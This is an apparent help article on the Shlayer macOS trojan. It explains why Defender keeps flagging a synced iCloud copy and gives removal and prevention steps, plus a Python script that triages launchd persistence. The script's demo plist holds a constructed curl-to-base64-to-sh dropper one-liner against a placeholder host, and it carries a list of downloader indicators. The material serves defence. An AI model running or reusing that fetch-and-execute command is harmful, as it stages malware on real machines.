Shlayer: The most common macOS malware and how to get rid of it

Question:

How can I permanently remove the persistent Backdoor:MacOS/Shlayer!rfn malware from my iCloudDriveAppData folder? Windows Defender detects and deletes it repeatedly, but it keeps reappearing. Is this a false positive or a serious threat?

Answer:

How to get rid of the Shlayer Trojan on your Mac

If you use a Mac, or sync a Mac's iCloud Drive to a Windows PC, you may have run into a detection named Backdoor:MacOS/Shlayer!rfn. That is Microsoft's name for Shlayer, a macOS trojan that poses as an Adobe Flash Player update and installs adware and other unwanted applications; Microsoft files it under "Backdoor" because its first stage downloads and runs whatever further payloads the operators choose to serve. One point is worth settling before anything else: Windows Defender (Microsoft Defender Antivirus, the antivirus built into Windows 10) runs on Windows, not on macOS, and Shlayer's Mach-O binaries and shell scripts cannot execute on Windows at all. A Defender alert in a synced folder such as the iCloudDriveAppData folder named in the question therefore means the file was copied onto the PC from iCloud Drive, which in turn means a Mac signed into the same Apple ID almost certainly ran the installer. It is not a false positive in the sense of a clean file being misidentified, but it is not an infection of the PC either. Defender deleting the local copy does not settle it, because the source is still there: either the Mac is still infected and keeps producing the file, or the cloud copy is simply synced back down. In this article we explain how Shlayer works, why it is hard to get rid of, how to stop the file from reappearing, and how to keep your Mac clean.

Shlayer is a malware family first seen in 2018 and, according to Kaspersky's telemetry (see the Securelist source below), the most common threat on the macOS platform, having attacked about one in ten of the Macs it protected. It is distributed through fake software updates, malicious ads, compromised websites, and bundles with pirated software. Once the user downloads and runs the fake Flash Player installer, Shlayer's first stage is a shell script that decodes its embedded configuration, downloads the next stage and installs it; the payloads are adware families such as Bundlore, Pirrit and Geonei. These payloads display intrusive ads, hijack browser settings (homepage, search engine, new tab page), collect information about the user and the machine, and can download still more software.

Shlayer is not merely annoying. Its adware payloads intercept the user's web traffic, including HTTPS sessions, and inject the operators' own ads, which is how the campaign earns its money. Because the first stage will run whatever its operators serve, an infected Mac is also exposed to whatever they decide to push next, which could be ransomware, spyware or a keylogger rather than adware. Shlayer resists detection and removal through obfuscation, encrypted payloads, code signing and persistence mechanisms such as launchd agents. Some variants are written in Python, which is unusual for macOS malware, and hide their data behind a simple byte-shift encoding. Several variants were signed with valid Apple Developer ID certificates, so they passed Gatekeeper's signature check until Apple revoked the certificates; the article linked at the end of this page covers a 2021 Gatekeeper bug that let Shlayer skip those checks entirely. The lesson for anyone triaging a suspicious app is that "signed" does not mean "safe": look at who signed it.

How can I remove Shlayer from my Mac?

If you suspect that a Mac on your iCloud account is infected with Shlayer, clean the Mac first; scanning only the Windows PC that raised the alert treats the symptom. Windows Defender cannot scan a Mac, so the Windows step below only deals with the synced copy. Here are the general steps to follow:

  • On the Windows PC, update your Defender definitions and run a full scan (open Windows Security, click Virus & threat protection, then Scan options, choose Full scan and click Scan now) to confirm that nothing Windows-native came along with the synced file. Then stop the file from returning: locate it in iCloud Drive on the Mac or at iCloud.com, delete it there, and clear it from Recently Deleted so it cannot be restored or synced back down.
  • On the Mac, check the Applications folder and the Trash for apps you did not install, including anything presenting itself as a Flash Player installer or updater. Drag anything unfamiliar to the Trash and empty it. A third-party app uninstaller can remove leftover files and folders associated with the app.
  • Check your browser extensions and settings in Safari, Chrome and Firefox for unwanted changes. Disable or remove unfamiliar extensions; if your homepage, search engine or new tab page has been changed, restore your preferred settings. Clearing the browser cache and cookies removes traces the adware may have left behind.
  • Check what runs at login. Open System Preferences > Users & Groups > Login Items, and look in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons for property-list files you do not recognise, especially ones whose ProgramArguments run a shell one-liner, a curl download, or a binary from /tmp or a hidden folder. Also open System Preferences > Profiles and remove any configuration profile you did not install, since macOS adware uses profiles to lock browser settings. A Mac anti-malware tool such as Malwarebytes or CleanMyMac can be used as a second opinion for remnants and junk files.
  • Restart the Mac and rescan it. Let iCloud finish syncing, then rescan the Windows PC with Defender to confirm the synced copy is gone and stays gone. If the file still reappears, the source has not been found; at that point consult a professional or reinstall macOS.
How can I prevent Shlayer from infecting my Mac again?

The best way to prevent Shlayer or any other malware from infecting your Mac is to practice good security habits. Here are some tips that you can follow:

  • Avoid downloading or installing software from untrusted sources. Get software from the developer's official website or the App Store, and update it through the built-in update feature or the developer's site. Do not trust pop-ups or notifications claiming that your software is outdated. In particular, Adobe ended Flash Player support on 31 December 2020, so any prompt to install or update Flash is fraudulent by definition.
  • Be careful when clicking on links or ads on the web. Some of them may lead you to malicious websites or downloads. Use a reputable ad blocker or browser security extension to block or warn you about potentially harmful content. Also, check the URL and the certificate of the website before entering any sensitive information or downloading anything.
  • Keep macOS, your browsers and Windows (including Defender's definitions) updated. Updates carry security patches for the holes that malware like Shlayer exploits, Gatekeeper bypasses included. Enable automatic updates or check for updates manually on a regular schedule.
  • Use a strong and unique password for your Mac and your online accounts. Do not use the same password for different sites or services. Use a password manager to generate and store your passwords securely. Also, enable two-factor authentication whenever possible to add an extra layer of security to your accounts.
  • Back up your data regularly. If your Mac is infected or compromised, you can restore from the backup. An external drive, a cloud service or dedicated backup software will do; make sure the backup is encrypted and password-protected.
Shlayer is a persistent and dangerous piece of malware that can infect your Mac and cause a range of problems. Windows Defender will catch copies that sync to a PC, but only cleaning the Mac and deleting the file from iCloud Drive stops them coming back, and the prevention tips above keep the fake Flash installer from being run in the first place. Stay safe and enjoy your Mac!

Sources: [Shlayer Trojan attacks one in ten macOS users | Securelist]; [Backdoor:MacOS/Shlayer!rfn threat description – Microsoft Security Intelligence].
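As an added example for the "check what runs at login" step (this is not code from the original page, from Microsoft, Kaspersky or Apple), the script below does that check the way a responder would: it parses every launchd property list in the LaunchAgents and LaunchDaemons folders with Python's plistlib, reconstructs the command launchd would actually run, and flags commands that look like a downloader or stage-two loader (shell one-liners, curl, base64 or openssl decoders, quarantine-attribute removal, binaries under /tmp, /var/folders or a hidden dot-folder). On macOS it also asks codesign who signed a flagged binary, since Shlayer variants carried valid Developer ID signatures. Run it with Python 3 (installed with the Xcode command-line tools or Homebrew) on the Mac; off a Mac it falls back to two constructed sample plists whose labels, paths and example.invalid URL are invented for the demo. The indicator lists are this author's heuristics, not a published Shlayer signature.

```python
#!/usr/bin/env python3
"""Triage launchd persistence on a Mac suspected of running an adware dropper.

Added example for this article, not code from the page or from any vendor. The
indicator lists are heuristics, not a Shlayer signature, and the two demo
plists (labels, paths, URL) are constructed."""
import os
import plistlib
import re
import shutil
import subprocess
import tempfile

# Legitimate agents launch from /Applications, /usr, /System or /Library;
# installer-style loaders tend to run from these instead.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Interpreter-plus-one-liner fragments typical of a shell dropper.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "bash -c", "sh -c", "base64",
                     "openssl enc", "xattr -d com.apple.quarantine", "osascript")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")  # any dot-prefixed path component
REAL_DIRS = (os.path.expanduser("~/Library/LaunchAgents"),
             "/Library/LaunchAgents", "/Library/LaunchDaemons")


def launch_command(plist):
    """Command launchd would run: Program if set, else ProgramArguments[0]; rest is argv[1:]."""
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    if plist.get("Program"):
        args = [str(plist["Program"])] + args[1:]
    return " ".join(args)


def triage_plist(path):
    """Parse one launchd plist and list the reasons it looks like a loader."""
    with open(path, "rb") as fh:
        plist = plistlib.load(fh)
    cmd = launch_command(plist)
    reasons = []
    if any(d in cmd for d in SUSPICIOUS_DIRS):
        reasons.append("runs from a temp or shared directory")
    if HIDDEN_PATH.search(cmd):
        reasons.append("references a hidden (dot-prefixed) path")
    reasons += [f"command contains '{t.strip()}'" for t in SUSPICIOUS_TOKENS if t in cmd]
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is set, so it re-executes at every login")
    return {"file": os.path.basename(path), "label": plist.get("Label", "?"),
            "command": cmd, "reasons": reasons}


def scan_dir(dirpath):
    """Triage every .plist in dirpath, most-flagged first; [] if the dir is absent."""
    if not os.path.isdir(dirpath):
        return []
    findings = [triage_plist(os.path.join(dirpath, n))
                for n in sorted(os.listdir(dirpath)) if n.endswith(".plist")]
    return sorted(findings, key=lambda f: -len(f["reasons"]))


def signing_info(executable):
    """macOS only: codesign's 'Authority=' lines for a binary, None if unavailable.
    Shlayer shipped with valid Developer ID signatures, so check WHO signed, not just whether."""
    if not shutil.which("codesign") or not os.path.exists(executable):
        return None
    proc = subprocess.run(["codesign", "-dv", "--verbose=2", executable],
                          capture_output=True, text=True)
    return [ln for ln in proc.stderr.splitlines() if ln.startswith("Authority=")]


def build_demo_dir():
    """Write two CONSTRUCTED plists (one ordinary helper, one dropper-style agent)."""
    d = tempfile.mkdtemp(prefix="launchagents_demo_")
    samples = {
        "com.example.helper.plist": {
            "Label": "com.example.helper", "RunAtLoad": True,
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"]},
        "com.fakeflash.update.plist": {
            "Label": "com.fakeflash.update", "RunAtLoad": True, "KeepAlive": True,
            "ProgramArguments": ["/bin/sh", "-c", "curl -fsL http://example.invalid/s "
                                 "| base64 -D > /tmp/.p && sh /tmp/.p"]},
    }
    for name, plist in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(plist, fh)
    return d


if __name__ == "__main__":
    # On a Mac this walks the real persistence folders; elsewhere it uses the demo.
    for d in [p for p in REAL_DIRS if os.path.isdir(p)] or [build_demo_dir()]:
        for f in scan_dir(d):
            print(f"[{'SUSPECT' if f['reasons'] else 'ok'}] {d}/{f['file']} ({f['label']})")
            print(f"    {f['command']}")
            for r in f["reasons"]:
                print(f"    - {r}")
            signer = signing_info(f["command"].split(" ")[0]) if f["reasons"] else None
            if signer:
                print("    signer:", "; ".join(signer))
```

Anything marked SUSPECT deserves a look at the file it launches before you delete the plist: unload it first (`launchctl bootout gui/$(id -u) <path>` on current macOS), remove the plist and the target, then empty the Trash. A clean result from this script is not proof of a clean Mac, only that nothing in the standard launchd folders matches these heuristics; login items, configuration profiles and browser extensions still need the manual checks above.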

[A software bug let malware bypass macOS’ security defenses]
